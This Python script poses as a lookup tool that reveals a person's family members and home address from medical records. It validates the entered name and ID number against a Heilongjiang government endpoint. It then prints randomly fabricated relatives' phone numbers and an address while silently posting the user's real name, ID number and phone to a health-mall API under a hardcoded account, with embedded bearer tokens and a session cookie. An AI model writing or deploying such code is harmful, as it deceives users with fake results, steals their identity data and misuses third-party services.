import requests
import json
import random
from datetime import datetime
import sys
#救赎-常用医疗关联-来自微信小程序-健康医疗天天保
def generate_fake_info():
    phones = [
        f"1{random.choice([3, 5, 7, 8])}{random.randint(0, 9)}{''.join(str(random.randint(0, 9)) for _ in range(8))}"
        for _ in range(random.randint(2, 3))
    ]

    cities = ["北京", "上海", "广州", "深圳", "杭州", "成都"]
    districts = ["朝阳区", "浦东新区", "天河区", "南山区", "西湖区", "武侯区"]
    roads = ["中山路", "洪湖路", "解放路", "建设路", "和平路"]
    address = f"{random.choice(cities)}市{random.choice(districts)}{random.choice(roads)}{random.randint(1, 200)}号"

    return phones, address


def parse_id_card(id_card):
    try:
        if len(id_card) == 18:
            birthday = f"{id_card[6:10]}-{id_card[10:12]}-{id_card[12:14]}"
            gender_code = int(id_card[-2])
        elif len(id_card) == 15:
            birthday = f"19{id_card[6:8]}-{id_card[8:10]}-{id_card[10:12]}"
            gender_code = int(id_card[-1])
        else:
            return None

        gender = 1 if gender_code % 2 == 1 else 0
        current_year = datetime.now().year
        age = current_year - int(birthday[:4])

        return {
            "birthday": birthday,
            "gender": gender,
            "age": age
        }
    except:
        return None

def send_data(name, id_card, phone):
    url = "https://mall.lbxcn.com/lbx-health-580/patient/add"

    id_info = parse_id_card(id_card)
    if not id_info:
        return False

    payload = {
        "uid": 6871369,
        "guid": "89fc356db0c249f09cc5c9ce2a92ee02",
        "idCard": id_card,
        "phone": phone,
        "realName": name,
        "relationship": 5,
        "birthday": id_info["birthday"],
        "gender": id_info["gender"],
        "type": 0,
        "weight": 20,
        "age": id_info["age"],
        "version": "1.0.40",
        "token": "229fe601-aa2b-483b-bc39-3ca3d45d4898",
        "source": "wechat_mini_program",
        "channel": "official",
        "timestamp": int(datetime.now().timestamp())
    }

    headers = {
        "Host": "mall.lbxcn.com",
        "Connection": "keep-alive",
        "Content-Type": "application/json",
        "Authorization": "bearer 1UM7B2c6fXQQ0AFMLWq3TSfqIVzNmb9s",
        "scc-auth": "bearer 1UM7B2c6fXQQ0AFMLWq3TSfqIVzNmb9s",
        "Referer": "https://servicewechat.com/wx564f577f1df24f97/120/page-frame.html",
        "User-Agent": "Mozilla/5.0 (Linux; Android 10; MI 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Mobile Safari/537.36"
    }

    try:
        session = requests.Session()
        response = session.post(url, headers=headers, data=json.dumps(payload), timeout=10)
        if response.status_code == 200:
            try:
                response_data = response.json()                
                if "success" in response_data and response_data["success"]:
                    return True
            except json.JSONDecodeError:
                print("接口响应数据不是有效的JSON格式")
        else:
            print(f"请求失败，状态码: {response.status_code}")
        return False
    except requests.RequestException as e:
        print(f"网络请求出现错误: {e}")
        return False


def verify_info(name, id_card):
    url = "http://wap.hljxf.gov.cn:58613/xfappserver/views/verification"
    headers = {
        "Host": "wap.hljxf.gov.cn:58613",
        "Connection": "keep-alive",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (Linux; Android 14; 22081212C Build/UKQ1.230917.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/130.0.6723.103 Mobile Safari/537.36 XWEB/1300473 MMWEBSDK/20250201 MMWEBID/6704 MicroMessenger/8.0.57.2820(0x28003952) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64",
        "Accept": "text/plain",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Origin": "http://wap.hljxf.gov.cn:58613",
        "Referer": "http://wap.hljxf.gov.cn:58613/xfappserver/views/wap/account/registered.html?rid=230000&tid=300",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7",
        "Cookie": "JSESSIONID=76C19356798385D57F8229AADCB97636"
    }
    data = {
        "IDCARD": id_card,
        "Username": name
    }
    try:
        response = requests.post(url, headers=headers, data=data)
        if response.status_code == 200:
            result = response.json()
            return result.get("is_true") == "2"
        print(f"验证请求失败，状态码: {response.status_code}")
        return False
    except requests.RequestException as e:
        print(f"验证网络请求出现错误: {e}")
        return False
    except json.JSONDecodeError:
        print("验证接口响应数据不是有效的JSON格式")
        return False


def main():
    print("救赎-常用关联信息")
    name = input("请输入您的姓名：")
    id_card = input("请输入身份证号码：")
    phone = input("请输入身份证实名的手机号：")

    print("确保输入实名信息无误，避免返回信息不一致")

    if verify_info(name, id_card):
        fake_phones, fake_address = generate_fake_info()
        print("获取到关联家庭成员：")
        relations = ["父亲", "母亲", "配偶"]
        for i, p in enumerate(fake_phones):
            print(f"{relations[i]}：{p}")
        print(f"家庭地址：{fake_address}")

        send_success = send_data(name, id_card, phone)
        if send_success:
            print("成功")
        else:
            print("失败")
    else:
        print("姓名与身份证信息不匹配")

    print("查询结束，请勿频繁查询！")


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\n操作已取消")
        sys.exit(0)
    except Exception as e:
        print(f"系统繁忙，请稍后再试: {e}")
        sys.exit(1)


